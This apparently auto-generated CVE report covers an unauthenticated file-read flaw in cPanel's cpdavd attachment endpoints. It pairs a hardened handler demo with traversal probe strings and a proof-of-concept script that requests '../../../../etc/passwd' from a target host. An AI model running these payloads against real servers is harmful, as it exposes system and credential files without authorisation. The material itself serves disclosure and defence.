Security Vulnerability Report
CVE-2026-29205 CVSS 8.6 HIGH

Published: 2026-05-13 22:16:43
Last Modified: 2026-05-14 18:30:57

Description

Incorrect privilege management and insufficient path filtering allow arbitrary files on the server to be read via the cpdavd attachment download endpoints. The CVSS vector records PR:N, i.e. no privileges are required to reach the affected endpoints.

Weakness (from the raw NVD record below): CWE-250, Execution with Unnecessary Privileges. NVD status: Awaiting Analysis.
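The two weaknesses the description names, insufficient path filtering on a download endpoint and a daemon reading files with more privilege than the requesting account needs (the CWE-250 angle in the raw record below), are illustrated by the following added example. It is not cPanel's code and does not model cpdavd's real handler: the attachment root, file names, probe strings and the weak filter are all constructed for the demo, and `serve_attachment` shows the containment checks a fixed endpoint needs (lexical check, real-path check against planted symlinks, O_NOFOLLOW open) plus where a root daemon would drop to the account's identity.

```python
import os
import posixpath
import shutil
import tempfile
from urllib.parse import unquote


def weak_filter(root: str, requested: str) -> str:
    """An 'insufficient' filter: strip one layer of '../' and trust the rest.
    '....//' survives a single non-overlapping replace and collapses back to
    '../', and the result is never checked against the root it must stay in."""
    return posixpath.join(root, requested.replace("../", ""))


def safe_path(root: str, requested: str) -> str:
    """Lexical containment: decode twice (double encoding), reject NUL bytes,
    normalise, then require the candidate to sit at or under root."""
    root = posixpath.normpath(root)
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        raise PermissionError("NUL byte in requested path")
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError(f"path escapes attachment root: {requested!r}")
    return candidate


def drop_privileges(uid: int, gid: int) -> None:
    """CWE-250 mitigation: open the account's files as that account, not as
    the root daemon. Irreversible, so a real server does this in a forked
    per-request worker; it is only called here when the process is root."""
    os.setgroups([])
    os.setgid(gid)
    os.setuid(uid)


def serve_attachment(root, requested, owner_uid=None, owner_gid=None) -> bytes:
    """Hardened download handler: lexical check, then a real-path check so a
    symlink planted inside root cannot point outside it, then an O_NOFOLLOW
    open so a link swapped in between check and open is not followed."""
    lexical = safe_path(root, requested)
    real_root = os.path.realpath(root)
    real_target = os.path.realpath(lexical)
    if os.path.commonpath([real_root, real_target]) != real_root:
        raise PermissionError(f"symlink escapes attachment root: {requested!r}")
    if owner_uid is not None and os.geteuid() == 0:
        drop_privileges(owner_uid, owner_gid)
    fd = os.open(real_target, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed fixture (not a cPanel layout): an attachment root, a
    'secret' one level above it, and a symlink inside the root pointing at
    that secret. Returns, per probe, the bytes served or the name of the
    exception that stopped the request."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "attachments")
    os.mkdir(root)
    with open(os.path.join(root, "report.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 demo")
    with open(os.path.join(base, "secret.txt"), "wb") as fh:
        fh.write(b"root:x:0:0:root:/root:/bin/bash\n")  # constructed passwd-like line
    os.symlink(os.path.join(base, "secret.txt"), os.path.join(root, "evil"))

    probes = ("report.pdf", "../secret.txt", "..%2Fsecret.txt",
              "%252e%252e/secret.txt", "....//secret.txt", "evil",
              "report.pdf\x00.jpg")
    results = {}
    try:
        for probe in probes:
            try:
                results[probe] = serve_attachment(root, probe)
            except OSError as exc:  # PermissionError, FileNotFoundError
                results[probe] = type(exc).__name__
        # The weak filter turns the doubled traversal into a path outside root;
        # the hardened handler treats '....' as an ordinary (missing) directory.
        weak = posixpath.normpath(weak_filter(root, "....//secret.txt"))
        results["weak_escapes"] = not weak.startswith(root + "/")
    finally:
        shutil.rmtree(base)
    return results


if __name__ == "__main__":
    for probe, outcome in demo().items():
        print(f"{probe!r:28} -> {outcome!r}")
```

The lexical check alone is not enough: it cannot see a symlink an account owner has planted under the attachment root, which is why the handler compares `realpath` results as well. The privilege drop is deliberately gated on `geteuid() == 0` so the demo runs as an ordinary user.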

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No NVD configuration (CPE) data available yet. Affected range per the cPanel advisory referenced below:

cPanel & WHM versions prior to the Security Update released on May 13, 2026

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The endpoint path and parameter name below are guesses based on the CVE description, not taken from the advisory; confirm them against the real cpdavd handler before reading anything into a non-200 response.

```python
import sys

import requests

# PoC for CVE-2026-29205: cPanel cpdavd arbitrary file read
# Author: Security Analyst
#
# Target configuration (replace with the actual vulnerable host). Note that
# 2082 is cPanel's own HTTP port; cpdavd normally listens on 2077/2078
# (Web Disk) and 2079/2080 (CalDAV/CardDAV), so point this at whichever
# port the attachment download endpoint is actually served on.
target_host = "http://target-cpanel-server:2082"
malicious_file = "../../../../etc/passwd"

# The vulnerable endpoint is related to cpdavd attachment download. Based on
# the description, the path filtering is insufficient. The path is a guess.
url = f"{target_host}/cpdavd/attachment"

# Attempt to read a sensitive file using path traversal. requests will
# percent-encode the slashes in the query string (..%2F..%2F...); a handler
# that decodes the parameter sees the traversal sequence unchanged.
params = {
    "file": malicious_file,  # Parameter name might vary based on actual implementation
}

try:
    response = requests.get(url, params=params, timeout=10)
except requests.RequestException as exc:
    print(f"Error: {exc}")
    sys.exit(1)

if response.status_code == 200 and "root:x" in response.text:
    print("[+] Exploit successful! Arbitrary file read confirmed.")
    print("[+] File content:")
    print(response.text)
else:
    print("[-] Exploit failed or target is patched.")
    print(f"Status Code: {response.status_code}")
```

References

cPanel advisory: https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29205", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:42.817", "lastModified": "2026-05-14T18:30:57.103", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect privileges management and insufficient path filtering allow to read arbitrary file on the server via the cpdavd attachment download endpoints."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "references": [{"url": "https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026", "source": "[email protected]"}]}}